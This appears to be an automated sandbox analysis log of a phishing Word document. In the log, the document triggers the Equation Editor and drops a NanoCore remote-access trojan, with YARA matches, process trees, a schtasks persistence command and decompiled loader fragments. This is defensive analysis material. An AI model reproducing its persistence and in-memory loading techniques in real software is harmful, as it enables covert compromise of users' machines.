Source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.2374e04.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.2374e04.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: catx[1].exe.2.dr, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: smtpsvc.exe.5.dr, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@26/14@47/2
Source: C:\Users\user\AppData\Roaming\cat464923.exe File created: C:\Program Files (x86)\SMTP Service
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$W ORDER Ref PO-298721.doc
Source: C:\Users\user\AppData\Roaming\cat464923.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{f9198f9a-66a7-4bba-ab1c-dff8091cd717}
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC580.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ..................#...............#.....(.P.....................P.......>u......................................................................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................P.......................(.P.....L.......d.......t.......Xw......................................................................
Source: C:\Users\user\AppData\Roaming\cat464923.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\cat464923.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: NEW ORDER Ref PO-298721.doc Virustotal: Detection: 23%
Source: NEW ORDER Ref PO-298721.doc ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path}
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp'
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp4F5A.tmp'
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {C1636649-2706-44BF-BD6B-15CC427FB25D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe 0
Source: C:\Windows\System32\taskeng.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: unknown Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Users\user\AppData\Roaming\cat464923.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\cat464923.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: symbols\dll\System.pdb source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: j,C:\Windows\System.pdb@#P source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\geNROzYNTy\src\obj\Debug\grlL.pdb source: smtpsvc.exe
Source: Binary string: .pdbD source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: grlL.pdb0 source: cat464923.exe, 00000005.00000002.2347577380.000000000055D000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)
Source: catx[1].exe.2.dr, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: smtpsvc.exe.5.dr, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.0.cat464923.exe.8d0000.4.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.0.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.2.cat464923.exe.8d0000.6.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
.NET source code contains potential unpacker
Source: catx[1].exe.2.dr, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: smtpsvc.exe.5.dr, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.8d0000.4.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.cat464923.exe.8d0000.6.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DC400 push esp; iretd 5_2_002DC569
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DC658 pushfd ; iretd 5_2_002DC659
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_006B4459 push 00000000h; iretd 5_2_006B4464
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059C688 push edx; retn 0059h 12_2_0059C699
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BC688 push edx; retn 002Bh 13_2_002BC699
Source: initial sample Static PE information: section name: .text entropy: 7.60711640242
Source: initial sample Static PE information: section name: .text entropy: 7.60711640242
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
